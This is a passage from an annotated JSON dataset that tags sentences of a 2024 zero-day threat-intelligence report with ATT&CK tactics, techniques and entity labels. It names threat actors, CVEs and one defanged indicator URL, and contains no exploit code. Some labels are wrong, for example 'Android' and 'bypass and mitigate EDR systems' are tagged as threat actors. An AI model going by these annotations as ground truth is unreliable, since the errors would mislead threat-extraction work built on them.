"text": "end-user technology-focused vendor", "start": 139, "end": 173, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s62-da7877", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "Ivanti's placement in the top three reflects a new and crucial change, where a security vendor was targeted more frequently than a popular end-user technology-focused vendor.", "sentence_text": "We discuss in a following section how PRC-backed exploitation has focused heavily on security and network technologies, one of the contributing factors to the rise in Ivanti targeting.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "focus exploitation on security/network technologies and target Ivanti", "entities": [ { "text": " Ivanti", "start": 166, "end": 173, "label": "Infrastructure_Indicator" }, { "text": "security and network technologies", "start": 85, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "PRC", "start": 38, "end": 41, "label": "ThreatActor" }, { "text": "exploitation", "start": 49, "end": 61, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s63-19b467", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "We discuss in a following section how PRC-backed exploitation has focused heavily on security and network technologies, one of the contributing factors to the rise in Ivanti targeting.", "sentence_text": "We note that exploitation is not necessarily reflective of a vendor's security posture or software development processes, as targeted vendors and products depend on threat actor objectives and capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s64-809ce9", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "We note that exploitation is not necessarily reflective of a vendor's security posture or software development processes, as targeted vendors and products depend on threat actor objectives and capabilities.", "sentence_text": "Types of Exploited Vulnerabilities Threat actors continued to utilize zero-day vulnerabilities primarily for the purposes of gaining remote code execution and elevating privileges.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "utilize zero-day vulnerabilities to gain remote code execution and elevate privileges", "entities": [ { "text": " Threat actors", "start": 34, "end": 48, "label": "ThreatActor" }, { "text": "utilize zero-day", "start": 62, "end": 78, "label": "Action" }, { "text": "gaining remote code execution", "start": 125, "end": 154, "label": "Action" }, { "text": "elevating privileges", "start": 159, "end": 179, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s65-63c6c1", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "Types of Exploited Vulnerabilities Threat actors continued to utilize zero-day vulnerabilities primarily for the purposes of gaining remote code execution and elevating privileges.", "sentence_text": "In 2024, these consequences accounted for over half (42) of total tracked zero-day exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s66-434eb2", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "In 2024, these consequences accounted for over half (42) of total tracked zero-day exploitation.", "sentence_text": "Three vulnerability types were most frequently exploited.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s67-31ba02", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "Three vulnerability types were most frequently exploited.", "sentence_text": "Command injection (also at eight, including OS command injection) and cross-site scripting (XSS) (six) vulnerabilities were also frequently exploited in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s68-9587e7", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "Command injection (also at eight, including OS command injection) and cross-site scripting (XSS) (six) vulnerabilities were also frequently exploited in 2024.", "sentence_text": "Both code injection and command injection vulnerabilities were observed almost entirely targeting networking and security software and appliances, displaying the intent to use these vulnerabilities in order to gain control over larger systems and networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s69-c951a2", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "Both code injection and command injection vulnerabilities were observed almost entirely targeting networking and security software and appliances, displaying the intent to use these vulnerabilities in order to gain control over larger systems and networks.", "sentence_text": "All three of these vulnerability types stem from software development errors and require meeting higher programming standards in order to prevent them from occurring.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s70-9ff1d9", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "All three of these vulnerability types stem from software development errors and require meeting higher programming standards in order to prevent them from occurring.", "sentence_text": "However, patches prove the potential for these security exposures to be prevented in the first place with proper intention and effort and ultimately reduce the overall effort to properly maintain a product or codebase.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s71-c5ae57", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "However, patches prove the potential for these security exposures to be prevented in the first place with proper intention and effort and ultimately reduce the overall effort to properly maintain a product or codebase.", "sentence_text": "Who Is Driving Exploitation Due to the stealthy access zero-day vulnerabilities can provide into victim systems and networks, they continue to be a highly sought after capability for threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s72-1bb55a", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "Who Is Driving Exploitation Due to the stealthy access zero-day vulnerabilities can provide into victim systems and networks, they continue to be a highly sought after capability for threat actors.", "sentence_text": "GTIG tracked a variety of threat actors exploiting zero-days in a variety of products in 2024, which is consistent with our previous observations that zero-day exploitation has diversified in both platforms targeted and actors exploiting them.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit zero-days in various products and platforms", "entities": [ { "text": "threat actors", "start": 26, "end": 39, "label": "ThreatActor" }, { "text": "exploiting zero-days", "start": 40, "end": 60, "label": "Action" }, { "text": "zero-day exploitation", "start": 151, "end": 172, "label": "Action" }, { "text": "actors", "start": 220, "end": 226, "label": "ThreatActor" }, { "text": " exploiting ", "start": 226, "end": 238, "label": "Action" }, { "text": "platforms", "start": 197, "end": 206, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s73-ef27fa", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "GTIG tracked a variety of threat actors exploiting zero-days in a variety of products in 2024, which is consistent with our previous observations that zero-day exploitation has diversified in both platforms targeted and actors exploiting them.", "sentence_text": "We attributed the exploitation of 34 zero-day vulnerabilities in 2024, just under half of the total 75 we identified in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s74-15dab1", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "We attributed the exploitation of 34 zero-day vulnerabilities in 2024, just under half of the total 75 we identified in 2024.", "sentence_text": "While the proportion of exploitation that we could attribute to a threat actor dipped slightly from our analysis of zero-days in 2023, it is still significantly higher than the ~30% we attributed in 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s75-cd7450", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "While the proportion of exploitation that we could attribute to a threat actor dipped slightly from our analysis of zero-days in 2023, it is still significantly higher than the ~30% we attributed in 2022.", "sentence_text": "While this reinforces our previous observation that platforms' investment in exploit mitigations are making zero-days harder to exploit, the security community is also slowly improving our ability to identify that activity and attribute it to threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s76-a62d64", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "While this reinforces our previous observation that platforms' investment in exploit mitigations are making zero-days harder to exploit, the security community is also slowly improving our ability to identify that activity and attribute it to threat actors.", "sentence_text": "Consistent with trends observed in previous years, we attributed the highest volume of zero-day exploitation to traditional espionage actors, nearly 53% (18 vulnerabilities) of total attributed exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s77-9d5fc9", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "Consistent with trends observed in previous years, we attributed the highest volume of zero-day exploitation to traditional espionage actors, nearly 53% (18 vulnerabilities) of total attributed exploitation.", "sentence_text": "Of these 18, we attributed the exploitation of 10 zero-days to likely nation-state-sponsored threat groups and eight to CSVs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s78-4c2715", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "Of these 18, we attributed the exploitation of 10 zero-days to likely nation-state-sponsored threat groups and eight to CSVs.", "sentence_text": "CSVs Continue to Increase Access to Zero-Day Exploitation While we still expect government-backed actors to continue their historic role as major players in zero-day exploitation, CSVs now contribute a significant volume of zero-day exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s79-bd1de3", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "CSVs Continue to Increase Access to Zero-Day Exploitation While we still expect government-backed actors to continue their historic role as major players in zero-day exploitation, CSVs now contribute a significant volume of zero-day exploitation.", "sentence_text": "Their role further demonstrates the expansion of the landscape and the increased access to zero-day exploitation that these vendors now provide other actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s80-04f5fd", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "Their role further demonstrates the expansion of the landscape and the increased access to zero-day exploitation that these vendors now provide other actors.", "sentence_text": "In 2024, we observed multiple exploitation chains using zero-days developed by forensic vendors that required physical access to a device (CVE-2024-53104, CVE-2024-32896, CVE-2024-29745, CVE-2024-29748).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s81-86d19e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "In 2024, we observed multiple exploitation chains using zero-days developed by forensic vendors that required physical access to a device (CVE-2024-53104, CVE-2024-32896, CVE-2024-29745, CVE-2024-29748).", "sentence_text": "These bugs allow attackers to unlock the targeted mobile device with custom malicious USB devices.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1200", "name": "Hardware Additions" } ], "procedure": "Unlock targeted mobile device using malicious USB devices.", "entities": [ { "text": "unlock the targeted mobile device with custom malicious USB devices", "start": 30, "end": 97, "label": "Action" }, { "text": "malicious USB devices", "start": 76, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s82-3d8191", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "These bugs allow attackers to unlock the targeted mobile device with custom malicious USB devices.", "sentence_text": "For instance, GTIG and Amnesty International's Security Lab discovered and reported on CVE-2024-53104 in exploit chains developed by forensic company Cellebrite and used against the Android phone of a Serbian student and activist by Serbian security services.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1200", "name": "Hardware Additions" } ], "procedure": "Use Cellebrite exploit chains against an Android phone", "entities": [ { "text": "CVE-2024-53104 ", "start": 87, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "Serbian security services", "start": 233, "end": 258, "label": "ThreatActor" }, { "text": "exploit chains developed by forensic company Cellebrite ", "start": 105, "end": 161, "label": "MalwareTool" }, { "text": "used ", "start": 165, "end": 170, "label": "Action" }, { "text": "Cellebrite", "start": 150, "end": 160, "label": "ThreatActor" }, { "text": "Android phone", "start": 182, "end": 195, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s83-f5a95e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "For instance, GTIG and Amnesty International's Security Lab discovered and reported on CVE-2024-53104 in exploit chains developed by forensic company Cellebrite and used against the Android phone of a Serbian student and activist by Serbian security services.", "sentence_text": "GTIG worked with Android to patch these vulnerabilities in the February 2025 Android security bulletin PRC-Backed Exploitation Remains Persistent PRC threat groups remained the most consistent government-backed espionage developer and user of zero-days in 2024.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Develop and use zero-days for espionage", "entities": [ { "text": "Android ", "start": 17, "end": 25, "label": "ThreatActor" }, { "text": "PRC", "start": 103, "end": 106, "label": "ThreatActor" }, { "text": " Exploitation ", "start": 113, "end": 127, "label": "Action" }, { "text": "PRC threat groups", "start": 146, "end": 163, "label": "ThreatActor" }, { "text": " government-backed espionage developer", "start": 192, "end": 230, "label": "ThreatActor" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s84-1f62af", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "GTIG worked with Android to patch these vulnerabilities in the February 2025 Android security bulletin PRC-Backed Exploitation Remains Persistent PRC threat groups remained the most consistent government-backed espionage developer and user of zero-days in 2024.", "sentence_text": "We attributed nearly 30% (five vulnerabilities) of traditional espionage zero-day exploitation to PRC groups, including the exploitation of zero-day vulnerabilities in Ivanti appliances by UNC5221 (CVE-2023-46805 and CVE-2024-21887), which GTIG reported on extensively .", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit zero-day vulnerabilities in Ivanti appliances", "entities": [ { "text": "PRC groups", "start": 98, "end": 108, "label": "ThreatActor" }, { "text": " UNC5221", "start": 188, "end": 196, "label": "ThreatActor" }, { "text": "(CVE-2023-46805 ", "start": 197, "end": 213, "label": "Infrastructure_Indicator" }, { "text": " CVE-2024-21887", "start": 216, "end": 231, "label": "Infrastructure_Indicator" }, { "text": "exploitation ", "start": 124, "end": 137, "label": "Action" }, { "text": "espionage zero-day exploitation", "start": 63, "end": 94, "label": "Action" }, { "text": "Ivanti", "start": 168, "end": 174, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s85-8de7ad", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "We attributed nearly 30% (five vulnerabilities) of traditional espionage zero-day exploitation to PRC groups, including the exploitation of zero-day vulnerabilities in Ivanti appliances by UNC5221 (CVE-2023-46805 and CVE-2024-21887), which GTIG reported on extensively .", "sentence_text": "The exploitation of five vulnerabilities that we attributed to PRC groups exclusively focused on security and networking technologies.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Focus exploitation on security and networking technologies", "entities": [ { "text": "PRC groups", "start": 63, "end": 73, "label": "ThreatActor" }, { "text": "exploitation", "start": 4, "end": 16, "label": "Action" }, { "text": " networking technologies", "start": 109, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s86-b8f053", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "The exploitation of five vulnerabilities that we attributed to PRC groups exclusively focused on security and networking technologies.", "sentence_text": "This continues a trend that we have observed from PRC groups for several years across all their operations, not just in zero-day exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s87-1fa620", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "This continues a trend that we have observed from PRC groups for several years across all their operations, not just in zero-day exploitation.", "sentence_text": "North Korean Actors Mix Financially Motivated and Espionage Zero-Day Exploitation For the first time since we began tracking zero-day exploitation in 2012, in 2024, North Korean state actors tied for the highest total number of attributed zero-days exploited (five vulnerabilities) with PRC-backed groups.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit zero-day vulnerabilities for mixed financial and espionage motives", "entities": [ { "text": "North Korean Actors", "start": 0, "end": 19, "label": "ThreatActor" }, { "text": "North Korean state actors", "start": 165, "end": 190, "label": "ThreatActor" }, { "text": "Zero-Day Exploitation", "start": 60, "end": 81, "label": "Action" }, { "text": "PRC-backed groups.", "start": 287, "end": 305, "label": "ThreatActor" }, { "text": "zero-day exploitation ", "start": 125, "end": 147, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s88-54ebe0", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "North Korean Actors Mix Financially Motivated and Espionage Zero-Day Exploitation For the first time since we began tracking zero-day exploitation in 2012, in 2024, North Korean state actors tied for the highest total number of attributed zero-days exploited (five vulnerabilities) with PRC-backed groups.", "sentence_text": "This focus on zero-day exploitation in 2024 marks a significant increase in these actors' focus on this capability.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s89-31465b", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "This focus on zero-day exploitation in 2024 marks a significant increase in these actors' focus on this capability.", "sentence_text": "North Korean threat actors exploited two zero-day vulnerabilities in Chrome as well as three vulnerabilities in Windows products.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Exploit zero-day vulnerabilities in Chrome and Windows products", "entities": [ { "text": "North Korean threat actors", "start": 0, "end": 26, "label": "ThreatActor" }, { "text": "exploited", "start": 27, "end": 36, "label": "Action" }, { "text": "Chrome", "start": 69, "end": 75, "label": "Infrastructure_Indicator" }, { "text": " Windows products", "start": 111, "end": 128, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s90-c29162", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "North Korean threat actors exploited two zero-day vulnerabilities in Chrome as well as three vulnerabilities in Windows products.", "sentence_text": "In October 2024, it was publicly reported that APT37 exploited a zero-day vulnerability in Microsoft products.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Exploit a zero-day vulnerability in Microsoft products.", "entities": [ { "text": "APT37", "start": 47, "end": 52, "label": "ThreatActor" }, { "text": "exploited a zero-day vulnerability", "start": 53, "end": 87, "label": "Action" }, { "text": "Microsoft products", "start": 91, "end": 109, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s91-144287", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "In October 2024, it was publicly reported that APT37 exploited a zero-day vulnerability in Microsoft products.", "sentence_text": "The threat actors reportedly compromised an advertiser to serve malicious advertisements to South Korean users that would trigger zero-click execution of CVE-2024-38178 to deliver malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Compromise an advertiser to serve malicious ads triggering zero-click exploitation of CVE-2024-38178 to deliver malware", "entities": [ { "text": "CVE-2024-38178", "start": 154, "end": 168, "label": "Infrastructure_Indicator" }, { "text": "compromised an advertiser", "start": 29, "end": 54, "label": "Action" }, { "text": "serve malicious advertisements ", "start": 58, "end": 89, "label": "Action" }, { "text": "trigger zero-click execution ", "start": 122, "end": 151, "label": "Action" }, { "text": "deliver malware", "start": 172, "end": 187, "label": "Action" }, { "text": "malicious advertisements ", "start": 64, "end": 89, "label": "MalwareTool" }, { "text": "threat actors", "start": 4, "end": 17, "label": "ThreatActor" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s92-dd3864", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "The threat actors reportedly compromised an advertiser to serve malicious advertisements to South Korean users that would trigger zero-click execution of CVE-2024-38178 to deliver malware.", "sentence_text": "Although we have not yet corroborated the group's exploitation of CVE-2024-38178 as reported, we have observed APT37 previously exploit Internet Explorer zero-days to enable malware distribution.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "APT37 previously exploited Internet Explorer zero-days to enable malware distribution", "entities": [ { "text": " APT37", "start": 110, "end": 116, "label": "ThreatActor" }, { "text": "exploit", "start": 128, "end": 135, "label": "Action" }, { "text": "enable malware distribution", "start": 167, "end": 194, "label": "Action" }, { "text": " Internet Explorer", "start": 135, "end": 153, "label": "Infrastructure_Indicator" }, { "text": "exploitation of CVE-2024-38178", "start": 50, "end": 80, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s93-f2f84e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "Although we have not yet corroborated the group's exploitation of CVE-2024-38178 as reported, we have observed APT37 previously exploit Internet Explorer zero-days to enable malware distribution.", "sentence_text": "North Korean threat actors also reportedly exploited a zero-day vulnerability in the Windows AppLocker driver (CVE-2024-21338) in order to gain kernel-level access and turn off security tools.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Exploit a Windows AppLocker driver zero-day (CVE-2024-21338) to gain kernel access and disable security tools", "entities": [ { "text": "North Korean threat actors ", "start": 0, "end": 27, "label": "ThreatActor" }, { "text": " exploited ", "start": 42, "end": 53, "label": "Action" }, { "text": "(CVE-2024-21338)", "start": 110, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "gain kernel-level access and turn off security tools", "start": 139, "end": 191, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s94-12fccf", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "North Korean threat actors also reportedly exploited a zero-day vulnerability in the Windows AppLocker driver (CVE-2024-21338) in order to gain kernel-level access and turn off security tools.", "sentence_text": "This technique abuses legitimate and trusted but vulnerable already-installed drivers to bypass kernel-level protections and provides threat actors an effective means to bypass and mitigate EDR systems.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Abuse vulnerable, already-installed drivers to bypass EDR and kernel-level protections", "entities": [ { "text": " abuses legitimate and trusted but vulnerable already-installed drivers ", "start": 14, "end": 86, "label": "Action" }, { "text": "bypass kernel-level protections ", "start": 89, "end": 121, "label": "Action" }, { "text": "bypass and mitigate EDR systems", "start": 170, "end": 201, "label": "ThreatActor" }, { "text": "threat actors", "start": 134, "end": 147, "label": "ThreatActor" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s95-4b4b04", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "This technique abuses legitimate and trusted but vulnerable already-installed drivers to bypass kernel-level protections and provides threat actors an effective means to bypass and mitigate EDR systems.", "sentence_text": "Non-State Exploitation\nIn 2024, we linked almost 15% (five vulnerabilities) of attributed zero-days to non-state financially motivated groups, including a suspected FIN11 cluster's exploitation of a zero-day vulnerability in multiple Cleo managed file transfer products (CVE-2024-55956) to conduct data theft extortion.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit a zero-day in Cleo managed file transfer products (CVE-2024-55956) to conduct data theft extortion", "entities": [ { "text": "non-state financially motivated groups", "start": 103, "end": 141, "label": "ThreatActor" }, { "text": "FIN11 cluster", "start": 165, "end": 178, "label": "ThreatActor" }, { "text": "CVE-2024-55956", "start": 271, "end": 285, "label": "Infrastructure_Indicator" }, { "text": "exploitation", "start": 181, "end": 193, "label": "Action" }, { "text": " conduct data theft extortion", "start": 289, "end": 318, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s96-0de813", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "Non-State Exploitation\nIn 2024, we linked almost 15% (five vulnerabilities) of attributed zero-days to non-state financially motivated groups, including a suspected FIN11 cluster's exploitation of a zero-day vulnerability in multiple Cleo managed file transfer products (CVE-2024-55956) to conduct data theft extortion.", "sentence_text": "This marks the third year of the last four (2021, 2023, and 2024) in which FIN11 or an associated cluster has exploited a zero-day vulnerability in its operations, almost exclusively in file transfer products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s97-b622bc", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "This marks the third year of the last four (2021, 2023, and 2024) in which FIN11 or an associated cluster has exploited a zero-day vulnerability in its operations, almost exclusively in file transfer products.", "sentence_text": "Despite the otherwise varied cast of financially motivated threat actors exploiting zero-days, FIN11 has consistently dedicated the resources and demonstrated the expertise to identify, or acquire, and exploit these vulnerabilities from multiple different vendors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s98-c7bdf3", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "Despite the otherwise varied cast of financially motivated threat actors exploiting zero-days, FIN11 has consistently dedicated the resources and demonstrated the expertise to identify, or acquire, and exploit these vulnerabilities from multiple different vendors.", "sentence_text": "We attributed an additional two zero-days in 2024 to non-state groups with mixed motivations, conducting financially motivated activity in some operations but espionage in others.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s99-883e53", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "We attributed an additional two zero-days in 2024 to non-state groups with mixed motivations, conducting financially motivated activity in some operations but espionage in others.", "sentence_text": "Two vulnerabilities (CVE-2024-9680 and CVE-2024-49039, detailed in the next section) were exploited as zero-days by CIGAR (also tracked as UNC4895 or publicly reported as RomCom), a group that has conducted financially motivated operations alongside espionage likely on behalf of the Russian government , based partly on observed highly specific targeting focused on Ukrainian and European government and defense organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Threat actor CIGAR exploited CVE-2024-9680 and CVE-2024-49039 as zero-day vulnerabilities to gain initial access to targeted systems.", "entities": [ { "text": "CIGAR", "start": 116, "end": 121, "label": "ThreatActor" }, { "text": "CVE-2024-9680", "start": 21, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-49039", "start": 39, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "were exploited as zero-days", "start": 85, "end": 112, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s100-658b74", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "Two vulnerabilities (CVE-2024-9680 and CVE-2024-49039, detailed in the next section) were exploited as zero-days by CIGAR (also tracked as UNC4895 or publicly reported as RomCom), a group that has conducted financially motivated operations alongside espionage likely on behalf of the Russian government , based partly on observed highly specific targeting focused on Ukrainian and European government and defense organizations.", "sentence_text": "A look into zero-days discovered by GTIG researchers Spotlight #1: Stealing Cookies with Webkit On Nov. 12, 2024, GTIG detected a potentially malicious piece of JavaScript code injected on https://online.da.mfa.gov[.]ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1539", "name": "Steal Web Session Cookie" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Inject malicious JavaScript code into a Ukrainian government website", "entities": [ { "text": " https://online.da.mfa.gov[.]ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4", "start": 188, "end": 282, "label": "Infrastructure_Indicator" }, { "text": " injected", "start": 176, "end": 185, "label": "Action" }, { "text": "Stealing Cookies", "start": 67, "end": 83, "label": "Action" }, { "text": "JavaScript code", "start": 161, "end": 176, "label": "MalwareTool" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s101-4b81c5", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "A look into zero-days discovered by GTIG researchers Spotlight #1: Stealing Cookies with Webkit On Nov. 12, 2024, GTIG detected a potentially malicious piece of JavaScript code injected on https://online.da.mfa.gov[.]ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.", "sentence_text": "The JavaScript was loaded directly from the main page of the website of the Diplomatic Academy of Ukraine, online.da.mfa.gov.ua.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": 